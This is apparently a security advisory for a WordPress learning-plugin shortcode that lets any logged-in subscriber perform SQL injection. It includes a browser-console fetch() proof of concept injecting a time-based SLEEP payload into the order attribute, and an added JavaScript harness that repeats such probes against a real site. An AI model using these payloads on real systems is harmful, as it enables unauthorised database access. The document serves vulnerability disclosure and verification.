The plugin does not validate and escape some of its shortcode attributes before using them in SQL statements, which could allow any authenticated user, such as a subscriber, to perform SQL injection attacks. Note: the original advisory stated that the issue is only exploitable by contributors, but we confirmed that any authenticated user, such as a subscriber, can exploit it.
Run the command below in the web browser's developer console while logged in to the blog as a subscriber user. The payload injects a SLEEP(5) subquery through the order attribute, so on a vulnerable site the response arrives about 5 seconds later than a normal request.
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  // The order attribute is placed into the SQL query without validation or escaping;
  // the injected subquery makes the database sleep for 5 seconds, so a delayed
  // response confirms the injection (time-based blind SQL injection).
  "body": "action=parse-media-shortcode&shortcode=[learn_press_recent_courses order=' AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)' limit='1']",
  // send the logged-in subscriber's session cookie with the request
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
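A single slow response is weak evidence on a busy site, so a practitioner confirming the time-based injection above will want to compare a SLEEP(0) baseline (same injected query shape, no delay) against SLEEP(n) over several rounds. The harness below is an added example, not part of the original advisory or the plugin: it reuses the endpoint, action and shortcode payload from the PoC, while the timing thresholds, the probe() and classify() helpers, and the fakeBackend() stand-in (a constructed simulation of a vulnerable and a non-vulnerable site, so the code runs offline) are assumptions made for illustration.

```javascript
// Added example (not from the original advisory): confirm the time-based SQL injection
// through the parse-media-shortcode AJAX action by comparing a SLEEP(0) baseline against
// SLEEP(n) probes over several rounds instead of trusting one slow response.

const AJAX_PATH = "/wp-admin/admin-ajax.php";

// The advisory's shortcode payload with a chosen SLEEP duration in the order attribute.
function buildShortcode(sleepSeconds) {
  return `[learn_press_recent_courses order=' AND (SELECT 42 FROM (SELECT(SLEEP(${sleepSeconds})))b)' limit='1']`;
}

// POST body, URL-encoded as admin-ajax.php expects.
function buildBody(sleepSeconds) {
  const params = new URLSearchParams();
  params.set("action", "parse-media-shortcode");
  params.set("shortcode", buildShortcode(sleepSeconds));
  return params.toString();
}

// Decide whether the database honoured the injected SLEEP. Every probe must exceed the
// slowest baseline by most of the requested delay (tolerance), so one slow baseline or
// one fast probe cannot produce a false positive or negative.
function classify(baselineMs, probeMs, expectedDelayMs, tolerance = 0.8) {
  const base = Math.max(...baselineMs);
  return probeMs.every(ms => ms - base >= expectedDelayMs * tolerance);
}

// Time one request through a fetch-compatible function (window.fetch in a browser).
async function timedRequest(fetchImpl, sleepSeconds) {
  const start = Date.now();
  const res = await fetchImpl(AJAX_PATH, {
    method: "POST",
    headers: { "content-type": "application/x-www-form-urlencoded" },
    body: buildBody(sleepSeconds),
    credentials: "include", // send the logged-in subscriber's session cookie
  });
  await res.text();
  return Date.now() - start;
}

// Alternate baseline and probe requests so both see the same server load.
// msPerSecond is 1000 for a real database; the offline demo below scales it down.
async function probe(fetchImpl, { sleepSeconds = 5, rounds = 3, msPerSecond = 1000 } = {}) {
  const baselineMs = [];
  const probeMs = [];
  for (let i = 0; i < rounds; i++) {
    baselineMs.push(await timedRequest(fetchImpl, 0));
    probeMs.push(await timedRequest(fetchImpl, sleepSeconds));
  }
  const vulnerable = classify(baselineMs, probeMs, sleepSeconds * msPerSecond);
  return { baselineMs, probeMs, vulnerable };
}

// Constructed stand-in for a WordPress site so the harness runs offline (assumption,
// not real plugin behaviour): it reads SLEEP(n) out of the shortcode and, when
// "vulnerable", waits n * msPerSecond milliseconds on top of a fixed latency.
function fakeBackend({ vulnerable, msPerSecond = 100, latencyMs = 5 }) {
  return async (_url, init) => {
    const shortcode = new URLSearchParams(init.body).get("shortcode") || "";
    const m = /SLEEP\((\d+)\)/.exec(shortcode);
    const n = vulnerable && m ? Number(m[1]) : 0;
    await new Promise(resolve => setTimeout(resolve, latencyMs + n * msPerSecond));
    return { ok: true, text: async () => "" };
  };
}

// Offline demonstration against the constructed backends (SLEEP(5) becomes 500 ms).
probe(fakeBackend({ vulnerable: true }), { msPerSecond: 100 })
  .then(r => console.log("simulated vulnerable site:", r));
probe(fakeBackend({ vulnerable: false }), { msPerSecond: 100 })
  .then(r => console.log("simulated fixed site:", r));
```

Against a real installation, run `probe(window.fetch)` from the browser's developer console while logged in as a subscriber and leave msPerSecond at its default of 1000; the SLEEP(0) baseline keeps the injected query shape identical to the probe, so the only variable between the two timings is whether the injected SLEEP is executed.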